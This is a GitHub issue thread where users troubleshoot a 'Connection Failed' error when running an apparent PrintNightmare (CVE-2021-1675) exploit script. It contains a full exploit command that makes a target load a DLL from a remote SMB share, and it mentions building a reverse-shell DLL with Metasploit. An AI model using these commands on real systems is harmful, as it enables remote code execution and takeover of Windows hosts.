-
Notifications
You must be signed in to change notification settings - Fork 583
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Connection Failed #40
Comments
This is the syntax I have had the most success with in my lab. Also, my Metasploit is rusty, but I was only able to craft a working dll via shell_reverse_tcp I am still getting errors with meterpreter/handler, though. Best of luck. chmod +x CVE-2021-1675.py |
I have the Same error |
I got exactly the same error. |
I got the same error, Any leads? |
Did anybody work this out? It's an old thread but I'm struggling with it. Please let me know!! :) |
i have some issues with netbios name case, so try "whatever.local" in lowercase / uppercase alternatives |
hi, i tried to run the python script via windows cmd , and linux ubuntu 20 WSL both result in the same error
C:\Users\kolet\Downloads>python3 CVE-2021-1675.py hihi:[email protected] \\192.168.5.101\sft\re.dll [*] Connecting to ncacn_np:192.168.5.52[\PIPE\spoolss] [-] Connection Failed
i shared the re.dll with samba on linux , since it was in WSL i thought it did not work, so i just shared a folder with the re.dll inside and gave everyone permission to read/write into the folder and disable password requirement in the advanced sharing settings .
i made sure 192.168.5.52 could reach \192.168.5.101\sft\ manually (and it could.)
what am i doing wrong ?
thanks !
The text was updated successfully, but these errors were encountered: